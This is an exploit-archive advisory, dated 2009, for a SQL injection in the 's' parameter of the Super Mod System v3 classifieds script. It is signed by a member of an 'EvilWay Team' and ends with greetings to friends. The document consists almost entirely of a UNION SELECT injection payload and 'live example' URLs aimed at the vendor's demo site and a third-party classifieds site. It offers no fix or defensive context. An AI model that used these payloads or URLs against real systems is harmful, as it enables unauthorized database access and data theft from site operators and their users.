[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Super Mod System v3 (s) SQL Injection Vulnerability
# Published : 2009-07-27
# Author : MizoZ
# Previous Title : PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln
# Next Title : Inout Adserver (id) Remote SQL injection Vulnerability


----------------------------------------------------------------------------------------------------
  Name : Super Mod System 3.1 5
  Site : http://www.classified-software.co.uk/
  Demo : http://www.classified-software.co.uk/super-mod-system-v3/

----------------------------------------------------------------------------------------------------
 
  Found By : MizoZ [EvilWay Team]
  Made in  : Morocco
  Contact  : mizoz[at]9[dot]cn
  Greetz   : Moudi , Zuka , optix , All friends
  Website : BlackArea.org (Coming Soon)
----------------------------------------------------------------------------------------------------

SQL Injection popup.php (GET : sb_id) :
[HOST]/[PATH]/index.php?s=[SQL CODE]

SQL CODE : -6+union+select+1,2,3,4,5--

Live Exemples :
http://www.classified-software.co.uk/super-mod-system-v3/index.php?s=3+and+1=0+union+all+select+1,2,3,4,5--
http://www.thepharmaclassifieds.com/index.php?s=-6+union+select+1,2,3,4,5--

----------------------------------------------------------------------------------------------------

# www.Syue.com [2009-07-27]